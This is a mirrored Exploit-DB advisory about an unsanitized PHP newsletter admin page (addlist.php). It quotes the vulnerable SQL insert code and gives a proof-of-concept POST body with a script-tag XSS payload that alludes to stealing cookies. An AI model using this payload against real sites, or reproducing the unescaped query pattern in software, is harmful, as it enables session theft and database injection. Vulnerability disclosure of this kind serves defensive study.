bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/php/webapps/10337.txt
Offensive Security cc553d1147 DB: 2015-04-20 
11 new exploits
2015-04-20 12:44:13 +00:00

34 lines
No EOL
915 B
Text
Executable file
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

#################################################################
#
# Tested On: Windows Vista
# Note: For educational purposes only
#
#################################################################
Theres probably a lot more vulnerabilities in their web apps, but
I could not even get them to work out of the box..
http://server/newsletter/admin/addlist.php
Look no sanitization:
8<-------snip---------8<
if(isset($_POST['submit']))
{
$list=$_POST['list'];
if(strlen($list)<1)
{
print "You did not enter the name of the email list.";
}
else
{
$addemail="Insert into m_newsletters(newslettername) values('$list')";
mysql_query($addemail) or die("Could not add list");
print "List added.";
}
8<-------snip---------8<
POC POST request:
list=<script>alert('i could get your cookie')</script>&submit=submit
Reference in a new issue View git blame Copy permalink